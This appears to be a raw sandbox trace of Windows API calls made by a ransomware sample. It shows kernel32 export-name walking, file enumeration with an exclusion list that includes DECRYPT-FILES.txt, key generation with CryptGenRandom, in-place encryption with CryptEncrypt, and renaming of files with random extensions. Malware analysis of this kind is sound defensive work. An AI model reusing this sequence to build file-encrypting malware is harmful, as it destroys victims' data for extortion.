[0086.372] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.372] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.372] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.372] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.372] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.373] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.373] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.373] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.373] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.373] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.373] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.373] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.373] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.373] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.373] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.373] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.373] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.373] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.373] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.373] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.373] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.373] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.374] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.374] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.374] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.374] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.374] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.374] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.374] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.374] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.374] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.374] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.374] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.374] lstrlenA (lpString="DELETEATOM") returned 10 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.374] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.374] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.374] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.374] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.374] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.374] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.374] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.375] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.375] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.375] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.375] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.375] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.375] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.375] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.375] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.375] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.375] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.375] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.375] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.375] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.375] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.375] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.375] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.375] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.375] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.376] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.376] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.376] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.376] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.376] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.376] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.376] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.376] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.376] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.376] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.376] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.376] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.376] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.376] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.376] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.377] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif") returned 65 [0086.377] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif.3n0IXgB") returned 73 [0086.377] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ixqs-n95mkccder5.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif.3n0IXgB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ixqs-n95mkccder5.gif.3n0ixgb"), dwFlags=0x0) returned 1 [0086.377] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.377] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.378] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.378] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57062b80, ftCreationTime.dwHighDateTime=0x1d4ce98, ftLastAccessTime.dwLowDateTime=0x1c9408a0, ftLastAccessTime.dwHighDateTime=0x1d4c6b9, ftLastWriteTime.dwLowDateTime=0x1c9408a0, ftLastWriteTime.dwHighDateTime=0x1d4c6b9, nFileSizeHigh=0x0, nFileSizeLow=0xd76d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J5SxN.gif", cAlternateFileName="")) returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="autorun.inf") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="boot.ini") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="desktop.ini") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="ntuser.dat") returned -1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="iconcache.db") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="bootsect.bak") returned 1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="ntuser.dat.log") returned -1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="thumbs.db") returned -1 [0086.378] lstrcmpiW (lpString1="J5SxN.gif", lpString2="Bootfont.bin") returned 1 [0086.378] lstrlenW (lpString="J5SxN.gif") returned 9 [0086.378] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.378] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.378] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.378] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.378] lstrlenW (lpString="J5SxN.gif") returned 9 [0086.378] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="J5SxN.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif" [0086.378] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\j5sxn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.379] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=55149) returned 1 [0086.379] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.379] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.379] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.379] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.379] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.380] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.380] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.381] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.381] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.382] CloseHandle (hObject=0x42c) returned 1 [0086.382] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.382] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.383] CloseHandle (hObject=0x0) returned 0 [0086.383] CloseHandle (hObject=0x428) returned 1 [0086.383] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.383] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.383] GetTickCount () returned 0x114e0be [0086.383] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.384] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.384] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.384] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.384] lstrlenA (lpString="kernel32.dll") returned 12 [0086.384] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.384] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.384] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.384] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.385] lstrlenA (lpString="ADDATOMA") returned 8 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.385] lstrlenA (lpString="ADDATOMW") returned 8 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.385] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.385] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.385] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.385] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.385] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.385] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.385] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.385] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.385] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.385] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.385] lstrlenA 